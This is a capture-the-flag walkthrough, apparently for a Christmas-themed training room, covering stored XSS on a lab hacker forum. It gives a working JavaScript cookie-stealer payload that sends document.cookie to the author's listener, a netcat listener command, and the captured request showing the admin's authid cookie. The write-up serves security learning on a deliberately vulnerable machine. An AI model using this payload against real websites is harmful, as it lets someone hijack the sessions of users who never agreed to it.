McSkidy knows the crisis isn’t over. The best thing to do at this point is OSINT
we need to learn more about the christmas monster
During their OSINT, they came across a Hacker Forum. Their research has shown them that this forum belongs to the Christmas Monster. Can they gain access to the admin section of the forum? They haven’t made an account yet so make sure to register.
Access the machine at http://[your-ip-address]:3000 - it may take a few minutes to deploy.
Check out the supporting material here.
P.S. If you want to learn more about XSS, we have a room where you can learn about it in depth.
Setup
First let’s try all the form post to see if there is an XSS attack
As you can see the website is vulnerable to stored XSS
Now let’s implement cookie stealer.
Reference →
How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords
1<script>window.location = 'http://10.9.45.74:9999/page?param=' + document.cookie </script>
Now let’s wait for the admin’s token
1nc -lnvp 9999
#1 What is the admin’s authid cookie value?
1kali@kali:~$ nc -lnvp 99992listening on [any] 9999 ...3connect to [10.9.45.74] from (UNKNOWN) [10.10.125.201] 556684GET /page?param=authid="2564799a4e6689972f6d9e1c7b406f87065cbf65" HTTP/1.15Host: 10.9.45.746Connection: keep-alive7Upgrade-Insecure-Requests: 18User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/77.0.3844.0 Safari/537.369Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b310Referer: http://localhost:3000/admin11Accept-Encoding: gzip, deflate
